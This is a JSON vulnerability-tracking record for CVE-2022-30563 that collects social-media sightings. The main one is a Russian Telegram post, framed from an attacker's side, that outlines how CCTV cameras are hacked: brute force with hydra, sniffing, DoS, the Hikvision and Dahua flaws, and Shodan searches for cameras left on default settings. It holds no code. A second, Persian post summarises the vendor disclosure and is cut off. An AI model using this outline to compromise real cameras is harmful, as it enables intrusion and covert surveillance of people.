{"vulnerability": "CVE-2022-30563", "sightings": [{"uuid": "08b8e37d-0f4c-4647-9342-0a9b698a2b6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "published-proof-of-concept", "source": "https://t.me/technical_private_cat/28", "content": "\u0421\u043f\u0443\u0441\u043a\u0430\u0435\u043c\u0441\u044f \u0433\u043b\u0443\u0431\u0436\u0435 \u0432 \u043a\u0440\u043e\u043b\u0438\u0447\u044c\u044e \u043d\u043e\u0440\u0443 \u0433\u043e\u0441\u043f\u043e\u0434\u0430 \ud83d\udc07\n\u041c\u043d\u043e\u0433\u0438\u043c \u0438\u0437 \u0432\u0430\u0441 \u043d\u0430\u0432\u0435\u0440\u043d\u044f\u043a\u0430 \u0431\u044b\u043b\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e \u043a\u0430\u043a \"\u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0432\u0437\u043b\u043e\u043c \u043a\u0430\u043c\u0435\u0440 \u0432\u0438\u0434\u0435\u043e \u043d\u0430\u0431\u043b\u044e\u0434\u0435\u043d\u0438\u044f?\ud83c\udfa5\ud83d\udcf9\" .\n\u0421\u0435\u0439\u0447\u0430\u0441 \u0440\u0430\u0437\u0431\u0435\u0440\u0435\u043c\u0441\u044f!\n\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 :\n\u0427\u0435\u043b\u043e\u0432\u0435\u043a \u043f\u043e \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 ;\n\u041f\u0435\u0440\u0435\u0431\u043e\u0440 \u043f\u0430\u0440\u043e\u043b\u044f;\n\u043f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u043d\u0438\u0435 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 ;\n\u043a\u0430\u043a\u043e\u0439 \u043d\u0438\u0431\u0443\u0434\u044c Dos \u0438 Flooding;\ud83d\udca5\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0432\u0435\u0431 \u0441\u043b\u0443\u0436\u0431\u0430\u0445 ,\u0438\u043b\u0438 \u043a\u0430\u043a\u0438\u0445 \u043b\u0438\u0431\u043e \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0445 rce \u0438 \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u043c\u043e\u0434\u0435\u043b\u0438 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443;\n\u041a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 ;\n\u041f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u0438\u0441\u043a \u043a\u0430\u043c\u0435\u0440 \u0441 \u0437\u0430\u0432\u043e\u0434\u0441\u043a\u0438\u043c\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u043c\u0438 , \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f ;\n\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f  \u0432\u0438\u0440\u0443\u0441\u043e\u0432, \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u043a\u0430\u043a\u0438\u0445 \u043b\u0438\u0431\u043e \u043a\u0430\u043c\u0435\u0440;\ud83e\udda0\u2620\ufe0f\nSinkhole;\n\u0414\u0430\u0432\u0430\u0439\u0442\u0435 \u043e \u043a\u0430\u0436\u0434\u043e\u0439 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e .\ud83d\udd0e\n\u0427\u0435\u043b\u043e\u0432\u0435\u043a \u043f\u043e \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 - \u043d\u0443 \u0434\u0443\u043c\u0430\u044e \u0441 \u043d\u0438\u043c \u0432\u0441\u0435 \u043f\u043e\u043d\u044f\u0442\u043d\u043e \u043a\u043e\u0433\u0434\u0430 \u0434\u0432\u043e\u0435 \"\u043e\u0431\u0449\u0430\u044e\u0442\u0441\u044f\" \u043e\u043d \u0432\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u0435\u0431\u044f \u043f\u043e \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \n\u041a\u0430\u043a \u044d\u0442\u043e \u043e\u0431\u044b\u0447\u043d\u043e \u0434\u0435\u043b\u0430\u0435\u0442\u0441\u044f \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442\u0430 \u0441\u0435\u0430\u043d\u0441\u0430,\u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0435 \u0432\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0441\u0435\u0431\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0440\u0435\u0442\u0440\u0430\u043d\u0441\u043b\u044f\u0442\u043e\u0440\u043e\u0432 \u0438\u043b\u0438 \u043f\u0440\u043e\u043a\u0441\u0438-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0432 \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0443 \u0434\u0430\u043d\u043d\u044b\u0445,\u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u0441\u0441\u044b\u043b\u043e\u043a \u0444\u0438\u0448\u0438\u043d\u0433\u0430 \u0438 \u0442\u0434 ,\u0441 \u043f\u043e\u043c\u043e\u0449\u0431\u044e \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0438\n\u0411\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0438\u043c\u0435\u043d\u043d\u043e \u043f\u0440\u043e \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0442\u0430\u043a\u043e\u0439 \u0430\u0442\u0430\u043a\u0438  \u0432 \u0441\u0442\u0430\u0442\u044c\u044f\u0445 \u043d\u0438\u0436\u0435\n\u041f\u0435\u0440\u0435\u0431\u043e\u0440 \u043f\u0430\u0440\u043e\u043b\u044f- \u044d\u0442\u0430 \u0430\u0442\u0430\u043a\u0430 \u0434\u0430\u0432\u043e\u043b\u044c\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u0430 \u0432 \u0441\u0432\u043e\u0435\u0439 \u0441\u0443\u0442\u0438 \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0438\u043d\u0438\u043a \u043f\u0440\u0435\u0431\u0438\u0440\u0430\u0435\u0442 \u043f\u0430\u0440\u043e\u043b\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u043f\u0435\u0439\u0446\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u043b\u043e\u0432\u0430\u0440\u0435\u0439 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e \u043a\u0430\u043a\u0443\u044e \u043d\u0438\u0431\u0443\u0434\u044c hydra\ud83d\udc0d -\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u0430 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0431\u043e\u0440\u0430 \u043f\u0430\u0440\u043e\u043b\u0435\u0439.\n\u041f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u043d\u0438\u0435 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 - \u044d\u0442\u0430 \u0430\u0442\u0430\u043a\u0430 \u0442\u043e\u0436\u0435 \u0447\u0430\u0441\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0438\u043d\u0438\u043a \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u0435\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0435 \u043f\u0430\u043a\u0435\u0442\u044b \u0438 \u0438\u0449\u0435\u0442 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0430\u0443\u0442\u0435\u043d\u0434\u0435\u0444\u0438\u043a\u0430\u0446\u0438\u044e. \nDos \u0438 Flooding -\u044d\u0442\u043e \u0447\u0430\u0449\u0435 \u0432\u0441\u0435\u0433\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0432 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u0430\u0442\u0430\u043a\u0443\u0435\u043c\u043e\u0433\u043e \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 Ping-\u0444\u043b\u0443\u0434 \u2014 \u044d\u0442\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u0430\u044f  \u0430\u0442\u0430\u043a\u0430 \u0442\u0438\u043f\u0430 DoS, \u043f\u0440\u0438 \u043d\u0435\u0439 \u043c\u044b \u0432\u044b\u0432\u043e\u0434\u0438\u043c \u0438\u0437 \u0441\u0442\u0440\u043e\u044f \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432\u044b \u0438 \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u043c \u043f\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u043f\u043e\u0441\u043b\u0435 \u043f\u0440\u0435\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0435\u043c \u0437\u0430\u043f\u0440\u043e\u0441\u044b \u0432\u0445\u043e\u0434\u0430 \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 rce -\u043d\u0443 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u0440\u0438\u043c\u0435\u0440\u0430 \u043f\u0440\u0438\u0432\u0435\u0434\u0443 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443 rce \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u0432 \u043f\u0440\u043e\u0448\u0438\u0432\u043a\u0435 IP-\u043a\u0430\u043c\u0435\u0440 Hikvision -CVE-2021-36260\n\u042d\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e\u043c \u0436\u0435\u0440\u0442\u0432\u044b, \u0447\u0442\u043e \u0434\u0430\u0435\u0442 \u0433\u043e\u0440\u0430\u0437\u0434\u043e \u0431\u043e\u043b\u044c\u0448\u0438\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u0447\u0435\u043c \u0434\u0430\u0436\u0435 \u0432\u043b\u0430\u0434\u0435\u043b\u0435\u0446 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430,\n\u041f\u043e\u043c\u0438\u043c\u043e \u043f\u043e\u043b\u043d\u043e\u0439 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 IP-\u043a\u0430\u043c\u0435\u0440\u044b, \u043c\u043e\u0436\u043d\u043e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u043c \u0441\u0435\u0442\u044f\u043c \u0438 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0438\u0445.\n\u041f\u0440\u0438\u0447\u0435\u043c \u0430\u0442\u0430\u043a\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u0430\u0436\u0435 \u043d\u0435 \u0442\u0430\u043a \u0441\u043b\u043e\u0436\u043d\u0430 \u0432 \u0432\u043e\u043f\u043b\u043e\u0449\u0435\u043d\u0438\u0435 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0441\u0442\u0430\u0442\u044c\u044e \u0441 \u0440\u0430\u0437\u0431\u043e\u0440\u043e\u043c https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html\n\u0422\u0430\u043a \u0436\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0430\u044f \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043d\u043e\u0432\u0430\u044f rce \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Dahua -CVE-2022-30563 \u044d\u0442\u043e\u0442 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u043a \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043a\u0440\u0438\u0432\u043e\u043c \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0435 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438, \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u043c Dahua \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0432\u043e\u0438\u0445 IP-\u043a\u0430\u043c\u0435\u0440\u0430\u0445. \n\u0418\u0437-\u0437\u0430 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043e\u043a \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u043e\u0441\u043b\u0443\u0448\u0438\u0432\u0430\u0442\u044c \u043d\u0435 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0435 ONVIF \u0438 \u0432\u043e\u0441\u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u043d\u043e\u0432\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u0430\u0445 \u043a \u043a\u0430\u043c\u0435\u0440\u0435, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u0443\u0434\u0443\u0442 \u043f\u0440\u0438\u043d\u044f\u0442\u044b \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e\u043c \u043a\u0430\u043a \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435.\n\u041f\u043e\u043b\u0443\u0447\u0438\u0432 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0430 \u0432\u044b \u0441\u0430\u043c\u0438 \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u0442\u0435 \u0447\u0435\u043c \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0435 \u0447\u0435\u0440\u0435\u0432\u0430\u0442\u043e .\n\u0421\u0441\u044b\u043b\u043e\u0447\u043a\u0430 \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043d\u044f\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e -https://securityaffairs.co/wordpress/133877/security/dahua-severe-flaw.html\n\u041a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 -\u042d\u0442\u043e \u0430\u0442\u0430\u043a\u0438 \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u043d\u0430 \u043f\u0435\u0440\u0435\u0445\u0432\u0430\u0442 \u043a\u043b\u044e\u0447\u0435\u0439 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438\u043b\u0438 \u043a\u0430\u043a\u0438\u0435 \u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u0430\u043b\u0433\u043e\u0440\u0438\u0442\u043c\u0432\u0445 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f -\u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 \u043d\u0438\u0436\u0435\n\u041f\u043e\u0438\u0441\u043a \u043a\u0430\u043c\u0435\u0440 \u0441 \u0437\u0430\u0432\u043e\u0434\u0441\u043a\u0438\u043c\u0438 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u043c\u0438 - \u043c\u043d\u043e\u0433\u0438\u0435 \u043b\u044e\u0434\u0438 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0433\u043b\u0443\u043f\u044b \u0447\u0442\u043e\u0431\u044b \u043d\u0435 \u043f\u043e\u043c\u0435\u043d\u044f\u0442\u044c \u0437\u0430\u0432\u043e\u0434\u0441\u043a\u0438\u0435 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438 \u0434\u043b\u044f \u043f\u043e\u0438\u0441\u043a\u0430 \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043c\u0435\u0440 \u043c\u043e\u0436\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 zoomeye \u0438\u043b\u0438 shodan,censys\n\u0421\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u044f - \u043d\u0443 \u044d\u0442\u043e \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0444\u0438\u0448\u0438\u043d\u0433 \u0438\u043b\u0438 \u043f\u043e\u0434\u043e\u0431\u043d\u043e\u0435 .\u041c\u043e\u0436\u043d\u043e \u0437\u0430\u043e\u0431\u0449\u0430\u0442\u044c\u0441\u044f \u0441 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u0438\u0430\u043c\u0438 \u0447\u0442\u043e \u0442\u0430\u043c \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0442 \n\u041d\u0430\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0432\u0438\u0440\u0443\u0441\u043e\u0432 -\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0438\u043d\u0438\u043a \u043f\u0438\u0448\u0435\u0442 \u043a\u0430\u043a\u043e\u0433\u043e \u043d\u0438\u0431\u0443\u0434\u044c \u0442\u0440\u043e\u044f\u043d\u0430 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0438\u043b\u0438 \u0441\u0442\u0438\u043b\u043b\u0435\u0440\u0430 \u0438 \u043e\u0442\u043f\u0440\u0432\u043b\u044f\u0435\u0442 \u0435\u0433\u043e \u0432\u0430\u043c .\u0415\u0441\u0442\u044c \u0434\u0430\u0432\u043e\u043b\u044c\u043d\u043e \u043c\u043d\u043e\u0433\u043e \u0432\u0438\u0434\u043e\u0432 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0432\u0438\u0440\u0443\u0441\u043e\u0432 \nSinkhole- \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u043d\u0443\u0442\u0440\u0438\u043d\u043d\u0438\u0439 \u0443\u0437\u0435\u043b \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 .\n\u0427\u0435\u043c \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0447\u0435\u0440\u0435\u0432\u0430\u0442 \u0432\u0437\u043b\u043e\u043c \u043a\u0430\u043c\u0435\u0440 ?\n\u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043e\u043f\u0430\u0441\u043d\u043e \u044d\u0442\u043e \u0432 \u043a\u0430\u043a\u0438\u0445 \u043b\u0438\u0431\u043e \u0432\u043e\u0435\u043d\u043d\u044b\u0445 \u0443\u0447\u0435\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f\u0445 \u0438\u043b\u0438 \u043c\u0435\u0441\u0442\u0430\u0445 \u0441 \u043d\u0435\u043a\u043e\u0439 \u0441\u0435\u043a\u0440\u0435\u0442\u043d\u043e\u0441\u0442\u044c\u044e .\n\u041d\u043e \u0432\u0437\u043b\u043e\u043c \u043a\u0430\u043c\u0435\u0440 \u0432 \u043e\u0431\u044b\u0447\u043d\u044b\u0445 \u043e\u0444\u0438\u0441\u0430\u0445 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439  \u0442\u043e\u0436\u0435 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043e\u043f\u0430\u0441\u0435\u043d, \u0438\u0431\u043e \u0437\u043b\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0441\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \"\u0430\u0442\u0430\u043a\u0443 \u0432 \u0436\u0438\u0432\u0443\u044e\" p\u0430\u0437\u0432\u0435\u0434\u0430\u0432 \u0441\u043e\u0442\u0440\u0443\u0434\u043d\u0438\u043a\u043e\u0432 \u0438 \u0432\u0430\u0448\u0443 \u043e\u0431\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0443 \u043e\u043d \u043c\u043e\u0436\u0435\u0442 \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u043a \u043f\u0440\u0438\u043c\u0435\u0440\u0443 \u0430\u0442\u0430\u043a\u0443 \u0441 \u0441\u043e\u0446 \u0438\u043d\u0436\u0435\u043d\u0435\u0440\u0438\u0435\u0439 \u0438 \u0437\u0430\u0439\u0442\u0438 \u043a \u0432\u0430\u043c \u0432 \u043e\u0444\u0438\u0441 .\n\u042d\u0442\u043e \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u0435\u0441\u044c\u043c\u0430 \u043e\u043f\u0430\u0441\u043d\u043e .\n\u0414\u0430 \u0438 \u0434\u0443\u043c\u0430\u044e \u0447\u0442\u043e \u0434\u0430\u0436\u0435 \u0435\u0441\u043b\u0438 \u043e\u043d \u0442\u0430\u043a \u043d\u0435 \u043f\u043e\u0441\u0442\u0443\u043f\u0438\u0442 \u043d\u0435 \u043e\u0447\u0435\u043d\u044c \u043f\u0440\u0438\u044f\u0442\u043d\u043e \u043f\u043e\u043d\u0438\u043c\u0430\u0442\u044c \u0447\u0442\u043e \u0441\u0442\u0440\u043e\u043d\u043d\u0438\u0435 \u043b\u044e\u0434\u0438 \u0441\u043c\u043e\u0442\u0440\u044f\u0442 \u0437\u0430 \u0432\u0430\u043c\u0438 \u0447\u0435\u0440\u0435\u0437 \u0432\u0430\u0448\u0438 \u043a\u0430\u043c\u0435\u0440\u044b .\n\u0427\u0442\u043e \u0436  \u043d\u0430 \u044d\u0442\u043e\u043c \u044f \u0432\u0441\u0435 -\u0421\u043f\u0430\u0441\u0438\u0431\u043e \u0437\u0430 \u043f\u0440\u043e\u0447\u0442\u0435\u043d\u0438\u0435\u2764\ufe0f \u0418 \u043f\u043e\u043c\u043d\u0438 \u0432\u0441\u0435 \u0432 \u0442\u0432\u043e\u0438\u0445 \u0440\u0443\u043a\u0430\u0445 - \u0441\u043b\u0435\u0434\u0443\u0439 \u0437\u0430 \u0431\u0435\u043b\u044b\u043c \u043a\u0440\u043e\u043b\u0438\u043a\u043e\u043c \u0438 \u043f\u0440\u0438\u0434\u0435\u0448\u044c \u043a \u0441\u0432\u0435\u0442\u0443 .\ud83d\udc07\u2728\n#camera", "creation_timestamp": "2022-08-24T07:23:03.000000Z"}, {"uuid": "ebf79e80-0bbf-4c5b-9a5c-cb25466dec32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30563", "type": "seen", "source": "https://t.me/ics_cert/575", "content": "Nozomi Networks \u06cc\u06a9 \u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 CVSS 7.4 \u062f\u0631 \u062f\u0648\u0631\u0628\u06cc\u0646 \u0647\u0627\u06cc IP \u062f\u0627\u0647\u0648\u0627 \u06a9\u0634\u0641 \u06a9\u0631\u062f\u0647 \u0627\u0633\u062a \u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u062f\u0633\u062a\u06af\u0627\u0647 \u0647\u0627 \u0631\u0627 \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc \u06a9\u0646\u062f.\n\nCVE-2022-30563 \u0628\u0631 \u0627\u062c\u0631\u0627\u06cc \u0645\u06a9\u0627\u0646\u06cc\u0633\u0645 \u0627\u062d\u0631\u0627\u0632 \u0647\u0648\u06cc\u062a WS-UsernameToken \u062a\u0627\u0644\u0627\u0631 \u06af\u0641\u062a\u0645\u0627\u0646 \u0631\u0627\u0628\u0637 \u0648\u06cc\u062f\u0626\u0648\u06cc\u06cc \u0634\u0628\u06a9\u0647 \u0628\u0627\u0632 (ONVIF) \u062f\u0631 \u0628\u0631\u062e\u06cc \u0627\u0632 \u062f\u0648\u0631\u0628\u06cc\u0646 \u0647\u0627\u06cc IP \u062f\u0627\u0647\u0648\u0627 \u062a\u0623\u062b\u06cc\u0631 \u0645\u06cc \u06af\u0630\u0627\u0631\u062f.\n\n\u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0645\u0646\u0637\u0628\u0642 \u0628\u0627 ONVIF \u0628\u0647 \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc \u062f\u0647\u0646\u062f \u062a\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0645\u062c\u0645\u0648\u0639\u0647 \u0627\u06cc \u0627\u0632 \u0631\u0627\u0628\u0637 \u0647\u0627\u06cc \u0628\u0631\u0646\u0627\u0645\u0647 \u0646\u0648\u06cc\u0633\u06cc \u0628\u0631\u0646\u0627\u0645\u0647 \u0646\u0648\u06cc\u0633\u06cc \u0627\u0633\u062a\u0627\u0646\u062f\u0627\u0631\u062f (API) \u0627\u0642\u062f\u0627\u0645\u0627\u062a \u0645\u062e\u062a\u0644\u0641\u06cc \u0631\u0627 \u0628\u0631 \u0631\u0648\u06cc \u06cc\u06a9 \u062f\u0633\u062a\u06af\u0627\u0647 \u0631\u0627\u0647 \u062f\u0648\u0631 \u0627\u0646\u062c\u0627\u0645 \u062f\u0647\u0646\u062f\u060c \u0627\u0632 \u062c\u0645\u0644\u0647 